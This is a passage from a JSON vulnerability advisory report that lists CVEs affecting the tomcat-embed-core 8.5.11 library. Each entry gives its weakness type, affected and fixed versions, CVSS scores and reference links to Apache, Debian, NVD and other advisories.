List","url":"https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7%40%3Ccommits.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca%40%3Cbugs.httpd.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1938"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1938"},{"summary":"Gentoo Advisory glsa-202003-43","url":"https://security.gentoo.org/glsa/202003-43"},{"summary":"NetApp Advisory ntap-20200226-0002","url":"https://security.netapp.com/advisory/ntap-20200226-0002"},{"summary":"Debian Advisory dsa-4673","url":"https://www.debian.org/security/2020/dsa-4673"},{"summary":"Debian Advisory dsa-4680","url":"https://www.debian.org/security/2020/dsa-4680"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"]}],"title":"CVE-2020-1938/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46589"]}],"cve":"CVE-2023-46589","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2023-11-28T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-46589"},{"system_name":"NetApp Advisory","text":"ntap-20231214-0009"}],"notes":[{"audience":"developers","category":"other","text":"Inconsistent Interpretation of HTTP Requests","title":"Additional CWE: 444"},{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Improper Input Validation vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Improper Input Validation vulnerability Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82, and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. 
A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue. ## Related CVE(s) BIT-tomcat-2023-46589, CVE-2023-46589"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.96"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.96"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/11/28/2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2024/01/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46589"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46589"},{"summary":"NetApp Advisory ntap-20231214-0009","url":"https://security.netapp.com/advisory/ntap-20231214-0009"},{"summary":"Openwall Mailing 
List","url":"https://www.openwall.com/lists/oss-security/2023/11/28/2"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.96"]}],"title":"CVE-2023-46589/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-42795"]}],"cve":"CVE-2023-42795","cwe":{"id":"459","name":"Incomplete Cleanup"},"discovery_date":"2023-10-10T18:31:35","ids":[{"system_name":"CVE Record","text":"CVE-2023-42795"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20231103-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Incomplete Cleanup vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Incomplete Cleanup vulnerability Incomplete Cleanup vulnerability in Apache Tomcat. 
When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue. ## Related CVE(s) BIT-tomcat-2023-42795, CVE-2023-42795"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/10/9"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/065jfyo583490r9j2v73nhpyxdob56lw"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-42795"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-42795"},{"summary":"NetApp Advisory ntap-20231103-0007","url":"https://security.netapp.com/advisory/ntap-20231103-0007"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory 
dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-42795/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-25122"]}],"cve":"CVE-2021-25122","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2021-06-16T17:45:29","ids":[{"system_name":"CVE Record","text":"CVE-2021-25122"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-4891"},{"system_name":"Gentoo Advisory","text":"glsa-202208-34"},{"system_name":"NetApp Advisory","text":"ntap-20210409-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 
to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request. ## Related CVE(s) BIT-tomcat-2021-25122, CVE-2021-25122"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.63"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.63"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/01/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd90bf36b1877e1310b87ecd14ed7bbb15da52b297efd9f0e7253a3b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0463f9a5cbc02a485404c4b990f0da452e5ac5c237808edba11c947@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E"},{"summary":"Debian Mailing 
List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25122"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25122"},{"summary":"Gentoo Advisory glsa-202208-34","url":"https://security.gentoo.org/glsa/202208-34"},{"summary":"NetApp Advisory ntap-20210409-0002","url":"https://security.netapp.com/advisory/ntap-20210409-0002"},{"summary":"Debian Advisory dsa-4891","url":"https://www.debian.org/security/2021/dsa-4891"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.63"]}],"title":"CVE-2021-25122/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-25329"]}],"cve":"CVE-2021-25329","cwe":{"id":"502","name":"Deserialization of Untrusted 
Data"},"discovery_date":"2021-03-19T20:11:13","ids":[{"system_name":"CVE Record","text":"CVE-2021-25329"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-4891"},{"system_name":"Gentoo Advisory","text":"glsa-202208-34"},{"system_name":"NetApp Advisory","text":"ntap-20210409-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Potential remote code execution in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Potential remote code execution in Apache Tomcat The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue. 
## Related CVE(s) BIT-tomcat-2021-25329, CVE-2021-25329"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.61"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/01/2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r732b2ca289dc02df2de820e8775559abd6c207f159e39f559547a085@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25329"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25329"},{"summary":"Gentoo Advisory glsa-202208-34","url":"https://security.gentoo.org/glsa/202208-34"},{"summary":"NetApp Advisory ntap-20210409-0002","url":"https://security.netapp.com/advisory/ntap-20210409-0002"},{"summary":"Debian Advisory dsa-4891","url":"https://www.debian.org/security/2021/dsa-4891"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.0,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.0,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.0,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"]}],"title":"CVE-2021-25329/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/de
tail/CVE-2022-42252"]}],"cve":"CVE-2022-42252","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-11-01T12:00:30","ids":[{"system_name":"CVE Record","text":"CVE-2022-42252"},{"system_name":"Gentoo Advisory","text":"glsa-202305-37"}],"notes":[{"audience":"developers","category":"other","text":"Inconsistent Interpretation of HTTP Requests","title":"Additional CWE: 444"},{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat may reject request containing invalid Content-Length header"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat may reject request containing invalid Content-Length header If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header. 
## Related CVE(s) BIT-tomcat-2022-42252, CVE-2022-42252"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.83"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.83"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/zzcxzvqfdqn515zfs3dxb7n8gty589sq"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42252"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42252"},{"summary":"Gentoo Advisory glsa-202305-37","url":"https://security.gentoo.org/glsa/202305-37"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.83"]}],"title":"CVE-2022-42252/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-41080"]}],"cve":"CVE-2023-41080","cwe":{"id":"601","name":"URL Redirection to Untrusted Site"},"discovery_date":"2023-08-25T21:30:48","ids":[{"system_name":"CVE Record","text":"CVE-2023-41080"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp 
Advisory","text":"ntap-20230921-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Open Redirect vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Open Redirect vulnerability URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92. The vulnerability is limited to the ROOT (default) web application. ## Related CVE(s) BIT-tomcat-2023-41080, CVE-2023-41080"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.93"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.93"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41080"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41080"},{"summary":"NetApp Advisory ntap-20230921-0006","url":"https://security.netapp.com/advisory/ntap-20230921-0006"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory 
dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.1,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":6.1,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":6.1,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.93"]}],"title":"CVE-2023-41080/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1935"]}],"cve":"CVE-2020-1935","cwe":{"id":"444","name":"Inconsistent Interpretation of HTTP Requests"},"discovery_date":"2020-02-28T01:10:48","ids":[{"system_name":"CVE Record","text":"CVE-2020-1935"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Debian Advisory","text":"dsa-4673"},{"system_name":"Debian Advisory","text":"dsa-4680"},{"system_name":"NetApp Advisory","text":"ntap-20200327-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Potential HTTP request smuggling in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Potential HTTP request smuggling in Apache Tomcat In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed 
some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely. ## Related CVE(s) BIT-tomcat-2020-1935, CVE-2020-1935"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.51"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r127f76181aceffea2bd4711b03c595d0f115f63e020348fe925a916c%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r441c1f30a252bf14b07396286f6abd8089ce4240e91323211f1a2d75@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r660cd379afe346f10d72c0eaa8459ccc95d83aff181671b7e9076919@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing 